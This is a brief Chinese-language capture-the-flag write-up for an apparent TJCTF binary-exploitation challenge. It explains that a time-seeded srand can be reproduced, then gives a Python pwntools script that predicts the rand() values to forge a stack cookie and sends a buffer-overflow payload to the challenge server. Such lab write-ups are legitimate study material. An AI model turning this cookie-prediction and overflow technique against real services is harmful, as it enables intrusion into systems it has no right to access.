题目原以为很简单,然后做起来才发觉自己这个知识点又不知道,srand函数是按照特定算法计算出seed来的,题目用的是当前时间,也就是说我们连接上他服务器,然后这时候生成的seed跟他就一样了,然后rand也就得出来了,题目不难,就是一个知识点,看wp后自己写的代码贴上
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import time
import subprocess
while True:
io=remote('problem1.tjctf.org',8000)
seed=int(time.time())
myio=process(argv=['rand',str(seed)],executable='./rand')
s=myio.recv()
srand=[]
for i in s:
srand=s.split('\n')
srand=srand[:-1]
cookie=''.join([p32(int(x)) for x in srand])
print cookie
#p32(0x0) replace j A*64 replace gets-array
#address=hex(0xFFFFFFFF+1-0xdeadbeef+0xA)
payload= "A" * 64 +cookie +p32(0x0)+p32(0x2152411b)
log.info('Payload : ' + payload)
io.sendlineafter("What is your name?\n",payload)
log.success(io.recv())
c=raw_input("Please input anykey")